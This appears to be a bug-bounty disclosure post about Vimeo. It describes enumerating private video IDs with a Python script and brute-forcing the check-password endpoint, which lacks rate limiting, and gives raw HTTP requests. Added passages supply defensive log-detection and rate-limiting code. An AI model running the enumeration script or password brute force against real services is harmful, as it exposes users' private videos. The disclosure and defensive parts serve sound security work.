Recent studies of data breaches show that weak password policies and missing rate limiting on sensitive endpoints are among the top causes of breaches, and I find that unfortunate, especially when it is preventable.
Recently "A Facebook bounty hunter Anand Prakash from India recently discovered a Password Reset Vulnerability,
a simple yet critical vulnerability that could have given an attacker
endless opportunities to brute force a 6-digit code and reset any
account's password"
The bug, because of how simple the attack is to carry out, was rewarded heavily by Facebook: such bugs don't require much know-how on the attacker's side.
This is one of my findings on Vimeo, though it was not rewarded and was closed as Informative. Still, the bug was simple enough that an attacker could use it to dump private videos hosted on Vimeo (private hosting being one of the key features of Vimeo video hosting).
A video is made private because the user wants to restrict it to the specific viewers they choose. So how could an attacker try to dump the private videos hosted on the Vimeo website? What he needs:
1. He needs all the private video URLs hosted on Vimeo
2. He needs the password for each such video link as well
1. Achieving step 1: Dumping private video URL links:-
When you try to access a private video link at the URL given below
https://player.vimeo.com/video/16691xxxx/
Video ID: 16691xxxx
Request:-
GET /video/16691xxxx/ HTTP/1.1
Host: player.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: __utma=256147786.835234581.1463500113.1463500113.1463503110.2; __utmz=256147786.1463500113.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); player=""; vuid=610334891.557764322; _ga=GA1.2.8849839.1463503486; _ceg.s=o7byim; _ceg.u=o7byim
Connection: keep-alive
Response: the page contains the private video
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Xss-Protection: 1; mode=block
Content-Security-Policy: redacted
X-Content-Type-Options: nosniff
<!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,user-scalable=no"><meta name=robots content=noindex><title>Private Video on viemo
Now if an attacker sets up a Python script to brute-force the video ID and grep the response for "Private Video on Vimeo", then he can collect the URLs of all private videos hosted on Vimeo.
Python code:- (here I am just trying to dump the video series from 100 to 400 [it can be adjusted as required])

import requests

# walk video IDs 166947100 .. 166947399 and report which ones are private
for i in range(100, 400):
    videoid = '166947' + str(i)
    r = requests.get('https://player.vimeo.com/video/' + videoid)
    msg = r.text
    s = "Private Video on Vimeo"
    if s in msg:
        print("video is private, its id is %s" % videoid)
    else:
        print("not private")
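From the defending side, the ID walking described above leaves a recognisable pattern in the player's access logs. The following is an added example (not from the original post or from Vimeo): it parses a constructed log sample and flags clients that fetch many distinct video IDs in near-consecutive order; the log format, thresholds and IP addresses are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of player access-log lines (not real Vimeo logs):
# "client_ip request_line status". 203.0.113.7 walks consecutive video
# IDs the way the script above does; 198.51.100.2 is a normal viewer.
SAMPLE_LOG = """\
203.0.113.7 "GET /video/166947100/ HTTP/1.1" 200
203.0.113.7 "GET /video/166947101/ HTTP/1.1" 200
203.0.113.7 "GET /video/166947102/ HTTP/1.1" 404
203.0.113.7 "GET /video/166947103/ HTTP/1.1" 200
203.0.113.7 "GET /video/166947104/ HTTP/1.1" 200
198.51.100.2 "GET /video/166947250/ HTTP/1.1" 200
198.51.100.2 "GET /video/166947250/ HTTP/1.1" 200
203.0.113.7 "GET /video/166947105/ HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^(\S+) "GET /video/(\d+)/ [^"]*" (\d{3})$')

def parse_log(text):
    """Return (client_ip, video_id) for every player-page fetch in the log."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            hits.append((m.group(1), int(m.group(2))))
    return hits

def sequential_scanners(hits, min_ids=5, min_step_ratio=0.8):
    """Flag clients that fetch at least min_ids distinct video IDs where
    most successive IDs differ by exactly 1 (assumed thresholds)."""
    ids_by_client = defaultdict(set)
    for ip, vid in hits:
        ids_by_client[ip].add(vid)
    flagged = {}
    for ip, ids in ids_by_client.items():
        if len(ids) < min_ids:
            continue
        ordered = sorted(ids)
        consecutive = sum(1 for a, b in zip(ordered, ordered[1:]) if b - a == 1)
        if consecutive / (len(ordered) - 1) >= min_step_ratio:
            flagged[ip] = len(ordered)
    return flagged
```

Randomised or non-sequential video IDs would defeat this scan at the source; the detection above is the compensating control when IDs are predictable.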
2. Password for private videos
Now, as no rate limiting is implemented on the URL below, an attacker can brute-force the password field to bypass the authentication for viewing the video.
https://player.vimeo.com/video/166xxxxx/check-password
POST request:-
POST /video/1669xxxxx/check-password HTTP/1.1
Host: player.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
password={password can be bruteforced}&Watch%20Video
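The missing control here is a limit on failed password checks. The following is an added example, not Vimeo's code or the author's: a sliding-window limiter in front of a hypothetical check-password handler that counts failures per client IP and per video and refuses further attempts once the window is exhausted; the video ID, password and thresholds are constructed values.

```python
import hmac
import time
from collections import defaultdict, deque

# Constructed demo data (not a Vimeo video or password).
VIDEO_PASSWORDS = {"166947123": "correct horse"}

class PasswordCheckLimiter:
    """Sliding window: at most max_fails wrong guesses per key per window_s seconds."""

    def __init__(self, max_fails=5, window_s=300):
        self.max_fails = max_fails
        self.window_s = window_s
        self.fails = defaultdict(deque)  # key -> timestamps of recent failures

    def blocked(self, key, now):
        q = self.fails[key]
        while q and now - q[0] > self.window_s:  # drop failures outside the window
            q.popleft()
        return len(q) >= self.max_fails

    def record_failure(self, key, now):
        self.fails[key].append(now)

def check_password(limiter, video_id, client_ip, password, now=None):
    """Hypothetical check-password handler. Returns 'ok', 'wrong' or 'rate_limited'.
    Failures are counted per client IP and per video, so a single scanner and a
    distributed one both run into a limit."""
    now = time.time() if now is None else now
    keys = (("ip", client_ip), ("video", video_id))
    if any(limiter.blocked(k, now) for k in keys):
        return "rate_limited"
    expected = VIDEO_PASSWORDS.get(video_id, "")
    # constant-time comparison: the response time must not depend on the guess
    if expected and hmac.compare_digest(expected.encode(), password.encode()):
        return "ok"
    for k in keys:
        limiter.record_failure(k, now)
    return "wrong"

def demo_brute_force(attempts=8):
    """Eight wrong guesses from one client one second apart, then the right
    password: guesses stop being evaluated after max_fails failures."""
    limiter = PasswordCheckLimiter(max_fails=5, window_s=300)
    results = [check_password(limiter, "166947123", "203.0.113.7",
                              "guess%d" % i, now=1000.0 + i) for i in range(attempts)]
    results.append(check_password(limiter, "166947123", "203.0.113.7",
                                  "correct horse", now=1100.0))
    return results
```

The per-video counter also locks out a legitimate viewer for the rest of the window once a scanner has exhausted it, so in production it is usually paired with a higher per-video threshold or a CAPTCHA step rather than a hard block.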
Though while submitting the bug I forgot to read the Vimeo checklist, the simplicity of the attack could not be ignored here. Anyway, it's their discretion. As I didn't get an answer from them, I thought to publish it here.
Coincidence, we're to use Vimeo.. second, brute-forcing of the password is also required. Good approach.
What to do? They must have been feeling secure with it. Whereas security is always a myth.